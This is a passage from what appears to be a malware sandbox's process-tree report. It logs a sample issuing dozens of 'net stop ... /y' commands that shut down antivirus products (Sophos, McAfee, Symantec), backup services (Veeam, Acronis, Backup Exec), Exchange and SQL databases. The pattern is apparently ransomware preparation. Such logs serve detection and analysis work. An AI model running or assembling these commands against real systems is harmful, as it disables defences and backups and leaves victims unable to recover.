- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:556
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Acronis VSS Provider" /y4⤵PID:2184
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Acronis VSS Provider" /y5⤵PID:1216
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Enterprise Client Service" /y4⤵PID:3056
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Enterprise Client Service" /y5⤵PID:3044
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Agent" /y4⤵PID:984
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Agent" /y5⤵PID:2692
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos AutoUpdate Service" /y4⤵PID:2144
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y5⤵PID:1100
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Clean Service" /y4⤵PID:988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Clean Service" /y5⤵PID:2436
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Device Control Service" /y4⤵PID:2552
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Device Control Service" /y5⤵PID:1348
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos File Scanner Service" /y4⤵PID:2784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos File Scanner Service" /y5⤵PID:996
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Health Service" /y4⤵PID:2212
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Health Service" /y5⤵PID:2252
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos MCS Agent" /y4⤵PID:664
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Agent" /y5⤵PID:2188
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos MCS Client" /y4⤵PID:2696
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Client" /y5⤵PID:1108
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Message Router" /y4⤵PID:616
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Message Router" /y5⤵PID:2080
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Safestore Service" /y4⤵PID:988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Safestore Service" /y5⤵PID:2208
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos System Protection Service" /y4⤵PID:1764
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos System Protection Service" /y5⤵PID:564
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Web Control Service" /y4⤵PID:2436
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Web Control Service" /y5⤵PID:364
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "SQLsafe Backup Service" /y4⤵PID:1576
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Backup Service" /y5⤵PID:2156
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "SQLsafe Filter Service" /y4⤵PID:2172
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Filter Service" /y5⤵PID:1792
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Symantec System Recovery" /y4⤵PID:1604
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec System Recovery" /y5⤵PID:2344
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Veeam Backup Catalog Data Service" /y4⤵PID:1768
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y5⤵PID:1348
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop AcronisAgent /y4⤵PID:2540
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y5⤵PID:2520
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop AcrSch2Svc /y4⤵PID:1100
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y5⤵PID:2220
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop Antivirus /y4⤵PID:924
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Antivirus /y5⤵PID:1972
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecAgentAccelerator /y4⤵PID:2152
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y5⤵PID:2316
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ARSM /y4⤵PID:2296
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ARSM /y5⤵PID:2368
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecAgentBrowser /y4⤵PID:2696
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y5⤵PID:2980
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecDeviceMediaService /y4⤵PID:2188
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y5⤵PID:2620
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecJobEngine /y4⤵PID:2312
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y5⤵PID:2720
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecManagementService /y4⤵PID:1216
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y5⤵PID:2712
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecVSSProvider /y4⤵PID:3020
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y5⤵PID:2392
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecRPCService /y4⤵PID:1472
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y5⤵PID:2144
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop bedbg /y4⤵PID:2916
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop bedbg /y5⤵PID:988
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop DCAgent /y4⤵PID:2816
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DCAgent /y5⤵PID:428
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EPUpdateService /y4⤵PID:2836
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y5⤵PID:2812
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EPSecurityService /y4⤵PID:2840
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y5⤵PID:2332
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EraserSvc11710 /y4⤵PID:2988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y5⤵PID:2428
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EsgShKernel /y4⤵PID:2172
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y5⤵PID:2548
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop FA_Scheduler /y4⤵PID:2152
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y5⤵PID:2324
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop IISAdmin /y4⤵PID:796
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IISAdmin /y5⤵PID:2436
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop IMAP4Svc /y4⤵PID:2744
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IMAP4Svc /y5⤵PID:3028
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop macmnsvc /y4⤵PID:2948
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop macmnsvc /y5⤵PID:2964
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop masvc /y4⤵PID:2528
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop masvc /y5⤵PID:2468
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MBAMService /y4⤵PID:2980
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBAMService /y5⤵PID:2452
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MBEndpointAgent /y4⤵PID:960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y5⤵PID:2772
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McAfeeEngineService /y4⤵PID:2312
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y5⤵PID:2248
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McAfeeFramework /y4⤵PID:2412
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y5⤵PID:764
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McAfeeFrameworkMcAfeeFramework /y4⤵PID:2416
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y5⤵PID:3000
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McShield /y4⤵PID:2420
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McShield /y5⤵PID:428
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McTaskManager /y4⤵PID:2432
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McTaskManager /y5⤵PID:2392
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mfemms /y4⤵PID:924
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfemms /y5⤵PID:1100
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mfevtp /y4⤵PID:2872
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfevtp /y5⤵PID:2868
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MMS /y4⤵PID:2208
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MMS /y5⤵PID:2128
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mozyprobackup /y4⤵PID:2812
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y5⤵PID:2464
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MsDtsServer /y4⤵PID:2792
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y5⤵PID:3024
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MsDtsServer100 /y4⤵PID:1032
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y5⤵PID:1508
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MsDtsServer110 /y4⤵PID:3056
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y5⤵PID:2004
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeES /y4⤵PID:2516
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y5⤵PID:2560
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeIS /y4⤵PID:2928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y5⤵PID:2896
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeMGMT /y4⤵PID:2972
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y5⤵PID:2588
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeMTA /y4⤵PID:2760
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y5⤵PID:2644
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeSA /y4⤵PID:832
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y5⤵PID:796
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeSRS /y4⤵PID:2776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y5⤵PID:984
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$SQL_2008 /y4⤵PID:2324
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y5⤵PID:1668
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$SYSTEM_BGC /y4⤵PID:2756
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y5⤵PID:1376
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$TPS /y4⤵PID:2660
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y5⤵PID:2292
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$TPSAMA /y4⤵PID:2160
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y5⤵PID:2584
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$BKUPEXEC /y4⤵PID:956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y5⤵PID:2012
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$ECWDB2 /y4⤵PID:2612
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y5⤵PID:1652
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PRACTICEMGT /y4⤵PID:2512
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y5⤵PID:664
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PRACTTICEBGC /y4⤵PID:2448
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y5⤵PID:2328
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PROFXENGAGEMENT /y4⤵PID:1472
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y5⤵PID:2672
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SBSMONITORING /y4⤵PID:1540
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y5⤵PID:2800
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SHAREPOINT /y4⤵PID:1404
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y5⤵PID:2880
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SQL_2008 /y4⤵PID:1900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y5⤵PID:2964
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SYSTEM_BGC /y4⤵PID:2664
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y5⤵PID:2452
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$TPS /y4⤵PID:2852
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y5⤵PID:2280
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$TPSAMA /y4⤵PID:2364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y5⤵PID:2380
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y4⤵PID:1060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y5⤵PID:2948
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2012 /y4⤵PID:960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y5⤵PID:2240
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher /y4⤵PID:2620
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher /y5⤵PID:764
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y4⤵PID:3052
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y5⤵PID:2640
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SBSMONITORING /y4⤵PID:2744
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y5⤵PID:2520
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SHAREPOINT /y4⤵PID:2788
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y5⤵PID:2000
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SQL_2008 /y4⤵PID:2264
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y5⤵PID:924
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y4⤵PID:1288
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y5⤵PID:1172
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPS /y4⤵PID:2996
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y5⤵PID:2428
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPSAMA /y4⤵PID:2220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y5⤵PID:2076
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLSERVER /y4⤵PID:1176
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y5⤵PID:2320
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLServerADHelper100 /y4⤵PID:2748
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y5⤵PID:2072
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLServerOLAPService /y4⤵PID:540
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y5⤵PID:2560
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MySQL80 /y4⤵PID:1256
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL80 /y5⤵PID:3024
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MySQL57 /y4⤵PID:564
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL57 /y5⤵PID:2360
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ntrtscan /y4⤵PID:1992
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ntrtscan /y5⤵PID:2912
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop OracleClientCache80 /y4⤵PID:2692
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y5⤵PID:1604
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop PDVFSService /y4⤵PID:1104
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y5⤵PID:2896
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop POP3Svc /y4⤵PID:2832
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop POP3Svc /y5⤵PID:1876
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer /y4⤵PID:2760
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer /y5⤵PID:2260
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$SQL_2008 /y4⤵PID:3032
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y5⤵PID:984
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$SYSTEM_BGC /y4⤵PID:832
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y5⤵PID:2344
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$TPS /y4⤵PID:2608
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y5⤵PID:2104
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$TPSAMA /y4⤵PID:2784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y5⤵PID:2648
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop RESvc /y4⤵PID:916
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RESvc /y5⤵PID:2820
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop sacsvr /y4⤵PID:1576
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sacsvr /y5⤵PID:876
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SamSs /y4⤵PID:2288
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SamSs /y5⤵PID:2056
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SAVAdminService /y4⤵PID:928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y5⤵PID:3048
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SAVService /y4⤵PID:1624
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVService /y5⤵PID:2468
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SDRSVC /y4⤵PID:2656
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SDRSVC /y5⤵PID:1072
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SepMasterService /y4⤵PID:2672
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SepMasterService /y5⤵PID:1296
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ShMonitor /y4⤵PID:1472
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ShMonitor /y5⤵PID:1960
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop Smcinst /y4⤵PID:2448
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Smcinst /y5⤵PID:2920
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SmcService /y4⤵PID:1792
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SmcService /y5⤵PID:2664
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SMTPSvc /y4⤵PID:2132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y5⤵PID:2640
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SNAC /y4⤵PID:2452
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SNAC /y5⤵PID:2828
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SntpService /y4⤵PID:2632
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SntpService /y5⤵PID:2396
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop sophossps /y4⤵PID:2280
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophossps /y5⤵PID:764
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$BKUPEXEC /y4⤵PID:2364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y5⤵PID:3052
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$ECWDB2 /y4⤵PID:960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y5⤵PID:2744
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEBGC /y4⤵PID:1764
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y5⤵PID:2392
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEMGT /y4⤵PID:2544
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y5⤵PID:2576
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PROFXENGAGEMENT /y4⤵PID:3004
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y5⤵PID:2464
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SBSMONITORING /y4⤵PID:2520
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y5⤵PID:1288
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SHAREPOINT /y4⤵PID:2876
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y5⤵PID:1372
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SQL_2008 /y4⤵PID:2456
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y5⤵PID:2332
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SYSTEM_BGC /y4⤵PID:1760
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y5⤵PID:2916
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$TPS /y4⤵PID:1724
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y5⤵PID:2792
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$TPSAMA /y4⤵PID:2812
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y5⤵PID:2840
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y4⤵PID:852
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y5⤵PID:3056
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2012 /y4⤵PID:2604
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y5⤵PID:2388
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLBrowser /y4⤵PID:1840
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y5⤵PID:2928
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLSafeOLRService /y4⤵PID:2904
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y5⤵PID:2924
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLSERVERAGENT /y4⤵PID:328
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y5⤵PID:2236
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLTELEMETRY /y4⤵PID:2912
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y5⤵PID:2372
-
-
-
